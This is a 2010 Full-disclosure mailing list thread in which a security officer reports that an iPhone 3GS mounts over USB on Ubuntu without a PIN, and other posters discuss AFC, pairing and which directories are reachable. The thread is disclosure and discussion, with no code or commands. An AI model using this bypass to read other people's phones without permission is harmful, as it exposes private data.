But yes, as another poster mentioned, you're jailed to your Media directory unless jailbroken and connecting to afc2.

Sent from my Android phone

On May 17, 2010 3:35 AM, Bernd Marienfeldt be...@linx.net wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,

I've recently upgraded to Ubuntu Lucid Lynx (10.04 LTS) and been surprised by the iPhone 3GS (3.1.3 - 7E18) mounting behavior: fully switch off the iPhone 3GS and then connect it to the Lucid Lynx PC via USB; the phone turns on and will be automatically mounted without any authentication challenge (PIN), allowing read/write access to your various local data, e.g. purchases, DCIM, Downloads, Photos, Recordings etc.

Obviously there are other flaws discovered, see [1], which might be even worse depending on your security policy and requirements.

Can people confirm the same behavior with other iPhone models and OSs?

Cheers
Bernd

[1] http://marienfeldt.wordpress.com/2010/03/22/iphone-business-security-framework/ or http://tinyurl.com/yyjpfbn

- --
Bernd Marienfeldt (Information Security Officer LINX)
London Internet Exchange Ltd. Trinity Court, Peterborough, PE1 1DA
Registered England and Wales number 3137929

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkvxGlYACgkQuhj/IfS3mc5XegCg6Sh5Twpd/hmsigKBDOPyxU5e
+i4AoNBuLuJKrBkYyK6G/MD+s5PMD5XC
=9PPI
-----END PGP SIGNATURE-----
Re: [Full-disclosure] iPhone data protection flaw
Truly? Wait, are you going through AFC or some other way? It was my understanding that iPhone internal storage never comes up any other way... Doesn't lockdownd require that your computer be paired before even going SSL to start services?

On May 18, 2010 4:23 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:

Actually, no. It doesn't have to pair to read and write to internal storage. You only have access to the pictures dir and other files they may have put on the external storage section, but you can plug it into any system that has drivers and access it.

t

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-...